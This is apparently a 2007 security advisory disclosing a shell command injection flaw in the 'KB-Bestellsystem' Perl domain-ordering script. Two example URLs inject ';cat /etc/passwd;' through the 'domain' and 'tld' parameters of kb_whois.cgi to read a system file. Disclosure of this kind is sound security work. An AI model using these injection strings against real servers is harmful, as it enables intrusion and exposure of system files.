Remote Shell Command Execution in "KB-Bestellsystem" (amensa-soft.de)

2007-11-22T00:00:00
ID SECURITYVULNS:DOC:18483
Type securityvulns
Reporter Securityvulns
Modified 2007-11-22T00:00:00

Description

"KB-Bestellsystem" is a domain order system written in Perl. The "domain" and "tld" parameters in "kb_whois.cgi" are not filtering shell metacharacters.

The following examples will show you the /etc/passwd file:

http://targethost.com/kb-bestellsystem/kb_whois.cgi?action=check_owner&domain=;cat%20/etc/passwd;&tld=.com&tarrif= http://targethost.com/kb-bestellsystem/kb_whois.cgi?action=check_owner&domain=google&tld=.com;cat /etc/passwd;&tarrif=

<< Greetz Zero X >>